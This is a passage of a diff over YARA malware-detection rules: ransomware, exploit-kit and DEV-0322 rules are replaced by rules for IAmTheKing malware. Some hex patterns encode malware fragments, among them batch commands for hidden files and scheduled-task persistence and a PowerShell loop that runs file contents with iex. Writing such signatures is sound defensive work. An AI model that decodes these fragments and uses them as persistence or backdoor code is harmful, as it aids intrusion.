"28aa296bda12f0184564c5f6b46e679f07255aa8df58b861ea17910cdcaa674a" - hash2 = "03730cdc23a3d10c8752ad1464ff2e68a64c69f8310b0ceea4d52b1db0215dfc" - hash3 = "edd590c343570f7576aca83da58967e058585c6ba861682dca2fc987c713ee3a" - tlp = "White" - adversary = "Donot" + hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6" strings: - $seq1 = { 65 63 68 6f 20 6f 66 66 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 6d 64 20 25 73 20 0a 20 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 61 74 74 72 69 62 20 2b 61 20 2b 68 20 2b 73 20 25 73 20 0a 20 64 65 6c 20 2f 66 20 25 73 20 0a 20 53 45 54 20 2f 41 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 20 0a 20 53 45 54 20 2f 41 20 52 41 4e 44 3d 25 25 52 41 4e 44 4f 4d 25 25 20 31 30 30 30 30 20 2b 20 32 20 0a 20 65 63 68 6f 20 25 25 43 4f 4d 50 55 54 45 52 4e 41 4d 45 25 25 2d 25 25 52 41 4e 44 25 25 20 3e 3e 20 25 73 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 6f 62 55 70 64 61 74 65 20 2f 66 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 66 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 32 30 20 2f 66 20 2f 74 6e 20 54 61 73 6b 55 70 64 61 74 65 20 2f 74 72 20 25 73 20 20 0a 20 73 63 68 74 61 73 6b 73 20 2f 63 72 65 61 74 65 20 2f 73 63 20 6d 69 6e 75 74 65 20 2f 6d 6f 20 31 30 20 2f 66 20 2f 74 6e 20 4d 61 63 68 69 6e 65 43 6f 72 65 20 2f 74 72 20 25 73 20 0a 20 6d 6f 76 65 20 25 25 41 50 50 44 41 54 41 25 } - $seq2 = { c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 00 00 00 00 c7 04 24 ?? 42 [2] e8 ?? 01 00 00 83 ec 14 [0-3] c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 [2-5] 24 04 [0-3] 89 04 24 e8 ?? 01 00 00 83 ec 18 89 [1-9] c7 44 24 04 ?? 43 [2] c7 04 24 ?? 61 [2] e8 ?? 08 00 00 } - $s1 = "VirtualQuery failed for %d bytes at address %p" fullword ascii - $s2 = { 25 73 5c [1-14] 2e 62 61 74 } - $s3 = { 25 73 5c [1-14] 25 } + $s1 = "101;0000;" fullword ascii + $s2 = "hodll.dll" fullword ascii + $s3 = { 70 73 73 64 6B ?? ?? 2E 73 79 73 } + $s4 = { 70 73 73 64 6B ?? ?? 2E 76 78 64 } + $s5 = "##$$%%&&''(())**++,,--..//0123456789:;<=>?" fullword ascii + $s6 = "SYSTEM\\CurrentControlSet\\Services\\VxD\\MSTCP" fullword ascii + $s7 = "removehook" fullword ascii + $s8 = "installhook" fullword ascii + $s9 = "_crt_debugger_hook" fullword ascii + $s10 = "\\Files.txt" fullword ascii + $s11 = "\\report.txt" fullword ascii + $s12 = "\\Programs.txt" fullword ascii + $s13 = "\\Devices.txt" fullword ascii + $s14 = "\\music.mp3" fullword ascii + $s15 = "\\z.png" fullword ascii condition: - uint16(0)==0x5a4d and filesize >10KB and all of ($seq*) and 2 of ($s*) + 12 of them and filesize >120KB } -rule ARKBIRD_SOLG_RAN_Fuxsocy_May_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Jackofhearts_Jul_2021_1 : FILE { meta: - description = "Detect FuxSocy ransomware" + description = "Detect JackOfHearts malware" author = "Arkbird_SOLG" - id = "2420c2fa-bc94-51a6-87ab-4e8d226fdd23" - date = "2020-05-09" - modified = "2021-05-09" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/FuxSocy/RAN_FuxSocy_May_2021_1.yara#L1-L19" + id = "42d5eadb-dd94-5a15-8a0d-d1e56b58ce2e" + date = "2021-07-09" + modified = "2021-07-12" + reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_JackOfHearts_Jul_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "ab34f95d2b12bdf2d362538e880301542c3308fff427cfb5ee59e9dca89ec033" + logic_hash = "6cad69beb7c104ef19beb26ca42b923283a0303c230e30b48dde58f88af4cd42" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "d786355c1b3dc741103873aed46d8ffa3430d113a27482f37f3ffc7c978747f6" - hash2 = "43bbfb3389deb3846bba19a8ab2e9c8fd9b581720962b8170d4a63ad816b5804" + hash1 = "64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273" tlp = "White" - adversary = "-" + adversary = "IAmTheKing" strings: - $seq1 = { b8 48 14 00 00 e8 b8 83 00 00 53 55 56 8d 44 24 48 8b e9 50 55 89 54 24 14 33 f6 ff 15 84 02 41 00 8b d8 85 db 0f 84 fa 00 00 00 57 8b cb e8 2b 09 00 00 8b f8 85 ff 0f 84 e7 00 00 00 57 53 56 55 ff 15 8c 02 41 00 8b 1d 78 02 41 00 8d 44 24 18 50 8d 44 24 18 50 68 cc 14 48 00 57 89 74 24 24 89 74 24 28 ff d3 83 7c 24 18 04 0f 82 ab 00 00 00 8b 44 24 10 8b 4c 24 14 c7 44 24 1c 00 15 48 00 c7 44 24 20 14 15 48 00 c7 44 24 24 30 15 48 00 c7 44 24 28 48 15 48 00 c7 44 24 2c 60 15 48 00 c7 44 24 30 80 15 48 00 c7 44 24 34 a0 15 48 00 c7 44 24 38 c0 15 48 00 c7 44 24 3c e0 15 48 00 c7 44 24 40 fc 15 48 00 c7 44 24 44 14 16 48 00 c7 44 24 48 38 16 48 00 ff 74 84 1c 0f b7 41 02 50 0f b7 01 50 8d 44 24 60 68 54 16 48 00 50 ff 15 64 02 41 00 83 c4 14 8d 44 24 50 50 8d 44 24 14 50 8d 44 24 5c 50 57 ff d3 85 c0 74 0d 8b 4c 24 10 33 d2 e8 47 0a 00 00 8b f0 8b cf e8 c9 08 00 00 5f 8b c6 5e 5d 5b 81 c4 48 14 00 00 } - $seq2 = { 8d 44 24 50 50 8d 44 24 4c 50 8d 44 24 2c 50 55 ff 15 ec 00 41 00 8b 44 24 14 8b 74 24 18 ff 74 24 68 88 87 57 01 08 00 66 a1 80 4d 41 00 [10] 88 9f 54 01 08 00 c6 87 63 01 08 00 10 89 b7 58 01 08 00 66 89 87 5d 01 08 00 ff 15 6c 00 41 00 0f b6 97 63 01 08 00 03 c0 66 89 87 55 01 08 00 8b 44 24 20 8d 8f 64 01 08 00 88 87 5c 01 08 00 e8 14 2b 00 00 8b 44 24 14 0f b6 c8 0f b7 87 55 01 08 00 83 c1 03 8d 0c c8 89 8f 4c 01 08 00 e8 2e 3a 00 00 8b c8 89 8f 48 01 08 00 85 c9 0f 84 0f 01 00 00 8b 44 24 28 89 41 04 8b 8f 48 01 08 00 8b 44 24 24 89 01 8b 8f 48 01 08 00 8b 44 24 4c 89 41 0c 8b 8f 48 01 08 00 8b 44 24 48 89 41 08 8b 8f 48 01 08 00 8b 44 24 54 89 41 14 8b 8f 48 01 08 00 8b 44 24 50 89 41 10 0f b7 87 55 01 08 00 50 8b 87 48 01 08 00 ff 74 24 6c 83 c0 18 50 e8 b4 b5 00 00 8b 4c 24 6c 33 d2 e8 bd 3b 00 00 8b 4c 24 70 33 d2 89 47 08 e8 af 3b 00 00 0f b6 97 63 01 08 00 89 47 0c 8b 44 24 78 89 87 28 02 08 00 8b 44 24 44 89 47 04 8d 87 44 00 08 00 50 8d 8f 64 01 08 00 89 2f e8 4d 24 00 00 89 b7 18 02 08 00 8b 87 c5 01 08 00 f7 a7 58 01 08 00 8b c8 0f b6 87 5c 01 08 00 8b f2 99 83 c4 10 ff b7 28 02 08 00 03 c8 13 f2 03 0d 80 4d 41 00 13 35 84 4d 41 00 89 8f 1c 02 08 00 89 b7 20 02 08 00 ff 15 c4 00 41 00 53 57 ff 74 24 44 55 ff 15 e8 00 41 00 } - $seq3 = { 57 68 ff 01 0f 00 ff 75 08 8b fa 51 32 db ff 15 0c 00 41 00 8b f0 85 f6 74 76 32 ff eb 52 84 ff 75 65 33 c0 50 50 50 50 50 50 50 6a ff 6a 04 6a ff 56 ff 15 10 00 41 00 8b 45 c0 83 f8 01 74 2c 76 2e 83 f8 03 76 1a 83 f8 04 75 24 8d 45 e0 50 6a 01 56 ff 15 18 00 41 00 } - $seq4 = { 6a ff 8d 45 fc 50 8d 45 08 50 8d 45 f8 50 ff 33 33 ff 89 7d f8 89 7d 08 89 7d fc ff 15 c8 00 41 00 85 c0 8b 45 08 0f 95 c1 85 c0 74 59 56 } - $seq5 = { 8b 45 08 56 ff 70 08 ff 15 dc 00 41 00 8b ce e8 af 2e 00 00 33 ff 57 ff 75 08 57 ff 33 ff 15 e4 } + $s1 = "%appdata%" fullword ascii + $s2 = "%temp%" fullword ascii + $s3 = { 43 3a 5c 55 73 65 72 73 5c [2-10] 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c } + $s4 = "CreateServiceA" fullword ascii + $s5 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } + $s6 = "\\VarFileInfo\\Translation" fullword wide + $s7 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 } + $s8 = "\\SetupUi" fullword wide + $s9 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 } + $s10 = "%s.tmp" fullword wide condition: - uint16(0)==0x5a4d and filesize >30KB and 3 of ($seq*) + uint16(0)==0x5a4d and filesize >20KB and 7 of ($s*) } -rule ARKBIRD_SOLG_RAN_Yanluowang_Dec_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Queenofclubs_Jul_2021_1 : FILE { meta: - description = "Detect Yanluowang ransomware" + description = "Detect QueenOfClubs malware" author = "Arkbird_SOLG" - id = "339d3dab-9bdd-5a46-8261-c32862ccc3bf" - date = "2021-12-17" - modified = "2021-12-18" - reference = "https://samples.vx-underground.org/samples/Families/YanluowangRansomware/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-18/RAN_Yanluowang_Dec_2021_1.yara#L1-L20" + id = "d78df760-5753-528c-b03d-7bb91ec658c0" + date = "2021-07-09" + modified = "2021-07-12" + reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfClubs_Jul_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "0144874fb24411b4378a2e2992934e674808f01ecc38f23d0d9d37e1d45621e4" + logic_hash = "c6fe9dd24098ef3c281d9e6727613499988c88b9d2011af77390e0ce358bebf4" score = 75 quality = 75 tags = "FILE" - hash1 = "49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d" - hash2 = "d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c" - tlp = "white" - adversary = "-" - - strings: - $s1 = { 6a 00 68 7b 4d 45 00 e8 52 2a 00 00 6a 00 6a 00 68 44 58 45 00 68 78 58 45 00 68 d8 56 45 00 c6 45 fc 15 8b 3d d8 71 44 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 cc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 e4 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 fc 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 10 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 2c 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 88 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 a0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 b8 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 d0 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 ec 59 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 00 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 14 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 28 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 40 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 54 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 80 58 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 68 5a 45 00 68 78 58 45 00 68 d8 56 45 00 6a 00 ff d7 6a 00 6a 00 68 7c 5a 45 00 68 78 58 45 00 } - $s2 = { 83 bd d4 ee ff ff 10 8d 85 c0 ee ff ff 51 0f 43 85 c0 ee ff ff 8d 8d 90 ee ff ff 50 6a 30 68 a0 56 45 00 8d 85 c0 ee ff ff 50 ff b5 e8 ee ff ff e8 83 45 00 00 83 bd a4 ee ff ff 10 8d 85 90 ee ff ff 6a 00 0f 43 85 90 ee ff ff 6a 00 50 68 d4 56 45 00 68 d8 56 45 00 6a 00 ff d7 8b 95 a4 ee ff ff 83 fa 10 72 2f 8b 8d 90 ee ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc } - $s3 = { 68 00 00 00 f0 6a 01 6a 00 6a 00 8d 85 5c ee ff ff 50 ff 15 14 70 44 00 8d 85 40 ee ff ff 50 57 6a 01 ff b5 5c ee ff ff ff 15 40 70 44 00 8b 35 1c 70 44 00 8d 85 60 ec ff ff 6a 20 50 6a 00 6a 00 6a 01 6a 00 ff b5 40 ee ff ff c7 85 e8 ee ff ff 20 00 00 00 c7 85 60 ec ff ff 20 00 00 00 ff d6 ff b5 60 ec ff ff e8 1f cc 01 00 8b 8d 50 ec ff ff 83 c4 04 89 85 4c ec ff ff 0f 10 01 0f 11 00 0f 10 41 10 8d 8d e8 ee ff ff 0f 11 40 10 ff b5 60 ec ff ff 51 50 6a 00 6a 01 6a 00 ff b5 40 ee ff ff ff d6 8d 85 6c ec ff ff 33 ff 50 57 6a 01 68 80 00 00 00 ff b5 4c ec ff ff 89 bd 40 ec ff ff 89 bd bc ee ff ff ff 15 3c 70 44 00 85 c0 74 47 ff b5 6c ec ff ff e8 ae cb 01 00 83 c4 04 8b f0 8d 85 6c ec ff ff 89 b5 bc ee ff ff 50 56 6a 01 68 80 00 00 00 ff b5 4c ec ff ff ff 15 3c 70 44 00 85 } - $s4 = { 8b ec 6a ff 68 2b 52 44 00 64 a1 00 00 00 00 50 81 ec 8c 02 00 00 a1 c0 c8 45 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 6a 05 33 c0 c7 45 c0 00 00 00 00 68 84 57 45 00 8d 4d c0 c7 45 d0 00 00 00 00 c7 45 d4 07 00 00 00 66 89 45 c0 e8 59 3f 00 00 c7 45 fc 00 00 00 00 8d 4d d8 6a 03 33 c0 c7 45 d8 00 00 00 00 68 90 57 45 00 c7 45 e8 00 00 00 00 c7 45 ec 07 00 00 00 66 89 45 d8 e8 28 3f 00 00 6a 00 6a 0f c7 45 fc 01 00 00 00 ff 15 98 70 44 00 8b f0 89 b5 74 fd ff ff 83 fe ff 0f 84 2c 02 00 00 a1 9c 70 44 00 8d 7d c0 8b 0d 48 70 44 00 89 85 7c fd ff ff a1 80 70 44 00 89 85 78 fd ff ff a1 4c 70 44 00 89 85 80 fd ff ff a1 90 70 44 00 c7 85 88 fd ff ff 00 00 00 00 89 bd 84 fd ff ff 89 8d 6c fd ff ff 89 85 70 fd ff ff 66 66 66 } - - condition: - uint16(0)==0x5A4D and filesize >100KB and all of ($s*) -} -rule ARKBIRD_SOLG_Exp_Underminer_Apr_2021_1 : FILE -{ - meta: - description = "Detect Underminer exploit kit" - author = "Arkbird_SOLG" - id = "bd2a6b30-e05a-5f90-8dc2-719c1ba48a61" - date = "2021-04-14" - modified = "2021-04-15" - reference = "https://twitter.com/nao_sec/status/1382358986813415427" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-14/Underminer/Exp_Underminer_Apr_2021_1.yar#L1-L20" - license_url = "N/A" - logic_hash = "46dd4d8ba58e79761056d3dd6921530520b0071090bcfc3bfaed7a6804f787b7" - score = 75 - quality = 63 - tags = "FILE" - hash1 = "172ac73cda6260918510ad2f4481a7fcd90c5a86d47dd880c5bcb3596dd20a7d" - - strings: - $s1 = { 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 22 29 } - $s2 = "$version" fullword ascii - $s3 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 26 26 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3e 30 } - $s4 = { 6e 61 76 69 67 61 74 6f 72 2e 70 6c 75 67 69 6e 73 5b 22 53 68 6f 63 6b 77 61 76 65 20 46 6c 61 73 68 22 5d } - $s5 = { 63 6c 61 73 73 69 64 3d 27 63 6c 73 69 64 3a 44 32 37 43 44 42 36 45 2d 41 45 36 44 2d 31 31 63 66 2d 39 36 42 38 2d 34 34 34 35 35 33 35 34 30 30 30 30 27 } - $s6 = { 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68 22 } - $s7 = { 22 64 61 74 61 22 2c 22 2f 6c 6f 67 6f 2e 73 77 66 22 } - $s8 = { 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 30 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 2b 28 22 30 30 30 30 30 30 30 30 22 2b 28 [1-8] 5b 31 5d 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 38 29 } - - condition: - filesize >5KB and 6 of ($s*) -} -rule ARKBIRD_SOLG_UNK_DEV_0322_Jul_2021_1 : CVE_2021_35211 FILE -{ - meta: - description = "Detect the script used by DEV-0322 for create a new user after exploit the CVE-2021-35211" - author = "Arkbird_SOLG" - id = "8d16eb7f-c137-5f23-8830-ce26dc6e4d52" - date = "2021-07-16" - modified = "2021-11-10" - reference = "https://www.cadosecurity.com/triage-analysis-of-serv-u-ftp-user-backdoor-deployed-by-cve-2021-35211/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/DEV_0322/UNK_DEV_0322_Jul_2021_1.yara#L1-L26" - license_url = "N/A" - logic_hash = "7d7f012053bff6217f0fe9087acbeba13f83cb2c3dbe9a4fe8e7e0e4551edefd" - score = 75 - quality = 59 - tags = "CVE-2021-35211, FILE" - hash1 = "fb101d9980ba2e22dceac7367c670b4894eaae9a8cef9de98ed85499a3b014ea" - hash2 = "134a570f480536d04a056da99e58a3c982aa36f5b314f48a01420b66b759d35d" - hash3 = "8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0" - tlp = "white" - adversary = "DEV-0322" + hash1 = "b0a1da4fc5526365df495094f65660d88487ce5e60192e5fb4075e815f9481d3" + tlp = "White" + adversary = "IAmTheKing" strings: - $obj1 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 } - $obj2 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } - $arg1 = { 2d 73 74 6f 70 65 6e 67 69 6e 65 } - $arg2 = { 2d 73 74 61 72 74 73 65 72 76 69 63 65 } - $s1 = { 3c 3c 2d 20 41 64 6d 69 6e 54 79 70 65 } - $s2 = { 43 55 73 65 72 50 61 73 73 77 6f 72 64 41 74 74 72 5c 72 5c 6e 50 61 73 73 77 6f 72 64 } - $s3 = { 3c 3c 2d 20 50 61 73 73 77 6f 72 64 43 68 61 6e 67 65 64 4f 6e 5c 72 5c 6e 43 52 68 69 6e 6f 55 69 6e 74 41 74 74 72 } - $s4 = { 3c 3c 2d 20 49 6e 63 6c 75 64 65 52 65 73 70 43 6f 64 65 73 49 6e 4d 73 67 46 69 6c 65 73 } + $s1 = { 66 00 6f 00 72 00 28 00 3b 00 3b 00 29 00 7b 00 24 00 53 00 3d 00 47 00 65 00 74 00 2d 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 20 00 22 00 25 00 73 00 22 00 3b 00 49 00 46 00 28 00 24 00 53 00 29 00 7b 00 22 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 69 00 65 00 78 00 20 00 24 00 53 00 20 00 32 00 3e 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 24 00 74 00 2b 00 27 00 20 00 27 00 3b 00 65 00 63 00 68 00 6f 00 20 00 24 00 74 00 20 00 3e 00 3e 00 22 00 25 00 73 00 22 00 3b 00 7d 00 73 00 6c 00 65 00 65 00 70 00 20 00 2d 00 6d 00 20 00 36 00 30 00 30 00 3b 00 7d } + $s2 = { 50 00 6f 00 77 00 65 00 72 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 2d 00 6e 00 6f 00 70 00 20 00 2d 00 63 00 20 00 25 00 73 } + $s3 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } + $s4 = { 5c 00 7e 00 74 00 6d 00 70 00 5f 00 [6-20] ( 00 2e 00 6a 00 70 00 67 | 00 2e 00 70 00 73 00 31) } + $s5 = { c7 45 d8 ac 89 41 00 c7 45 dc 00 00 00 00 6a 01 68 00 00 40 04 8d 55 d8 52 68 c8 89 41 00 68 e0 89 41 00 8b 45 c0 83 c0 08 50 68 ec 89 41 00 8b 4d f4 51 ff 15 78 62 41 00 8b 55 c0 89 42 04 8b 45 c0 83 78 04 00 75 19 8b 4d f0 51 ff 15 74 62 41 00 8b 55 f4 52 ff 15 74 62 41 00 e9 14 ff ff ff 68 3c 04 00 00 e8 b7 70 00 00 83 c4 04 89 45 d0 8b 45 d0 89 45 e0 68 ec 01 00 00 e8 a1 70 00 00 83 c4 04 89 45 cc 8b 4d cc 89 4d d4 8b 55 c0 8b 32 b9 7b 00 00 00 8b 7d d4 f3 a5 6a 01 8b 45 c0 83 c0 1c 50 68 ec 01 00 00 8b 4d d4 51 68 c1 f5 09 00 8b 55 c0 83 c2 20 52 e8 04 ef ff ff } + $s6 = "http://bot.google.com" fullword ascii + $s7 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 00 00 25 00 73 00 00 00 00 00 25 00 73 } condition: - filesize >1KB and filesize <15KB and all of ($obj*) and all of ($arg*) and 3 of ($s*) + uint16(0)==0x5a4d and filesize >35KB and 5 of ($s*) } -rule ARKBIRD_SOLG_RAN_PYSA_Sept_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Kingofhearts_Jul_2021_1 : FILE { meta: - description = "Detect the PYSA ransomware" + description = "Detect KingOfHearts malware" author = "Arkbird_SOLG" - id = "fd939287-ec37-5021-9782-f0f86a9f0e4b" - date = "2021-09-23" - modified = "2021-11-10" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/PYSA/RAN_PYSA_Sept_2021_1.yara#L1-L20" + id = "b1efb4db-3864-5fdc-a3a0-992734eaf22f" + date = "2021-07-09" + modified = "2021-07-12" + reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_KingOfHearts_Jul_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "e16f2ae581b8627ccd4e8ecb56db52c992022473d006843ed19a69c8059ecb54" + logic_hash = "6761958760997030693c832c75098890b0d6d34fd6fe9c60d68d611497d57419" score = 75 - quality = 75 + quality = 50 tags = "FILE" - hash1 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14" - hash2 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14" - hash3 = "44f1def68aef34687bfacf3668e56873f9d603fc6741d5da1209cc55bdc6f1f9" - tlp = "white" - adversary = "RAAS" + hash1 = "0639e8f5e517c3f57d28bfd9f51cabfb275c64b7bca224656c2ac04f5a8c3af0" + hash2 = "0340a90ed4000e579c29f6ad7d4ab2ae1d30f18a2e777689e3e576862efbd6e0" + hash3 = "393ccb9853ea7628792e4dd982c2dd52dd8f768fdb7b80b20cbfc2fac4e298a4" + tlp = "White" + adversary = "IAmTheKing" strings: - $s1 = { 57 ff 15 38 a0 45 00 be [2] 45 00 33 ff 56 57 68 01 00 1f 00 ff 15 34 a0 45 00 85 c0 75 2b 56 57 57 ff 15 30 a0 45 00 57 8b f0 e8 44 00 00 00 6a 01 e8 3d 00 00 00 59 59 e8 3f ff ff ff 56 ff 15 2c a0 45 00 } - $s2 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 8d 45 f8 50 6a 02 6a 00 68 [2] 45 00 68 02 00 00 80 ff 15 0c a0 45 00 8b 15 bc 50 47 00 8b ca 8d 71 01 8a 01 41 84 c0 75 f9 2b ce 8b 35 08 a0 45 00 8d 41 01 50 52 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 6a 05 68 [2] 45 00 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 ff 75 f8 ff 15 10 a0 45 00 8b 4d fc 33 cd 5e e8 [2] 02 00 } - $s3 = { 57 8d 85 f8 fe ff ff bb 04 01 00 00 50 53 ff 15 48 a0 45 00 8d bd f8 fe ff ff 4f 8a 47 01 47 84 c0 75 f8 be [2] 45 00 8d 85 f4 fd ff ff 53 50 33 db a5 53 a5 66 a5 a4 ff 15 74 a0 45 00 8b cb 8a 84 0d f4 fd ff ff 88 84 0d f0 fc ff ff 41 84 c0 75 ed 8d 85 f0 fc ff ff 6a 5c 50 e8 [2] 02 00 59 59 85 c0 74 02 88 18 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 f8 fe ff ff 50 ff 15 1c a0 45 00 8b f8 83 ff ff 0f 84 a7 00 00 00 b9 78 50 47 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 95 f4 fd ff ff 8d 72 01 8a 02 42 84 c0 75 f9 2b d6 8d b5 f8 fe ff ff 8d 5e 01 8a 06 46 84 c0 75 f9 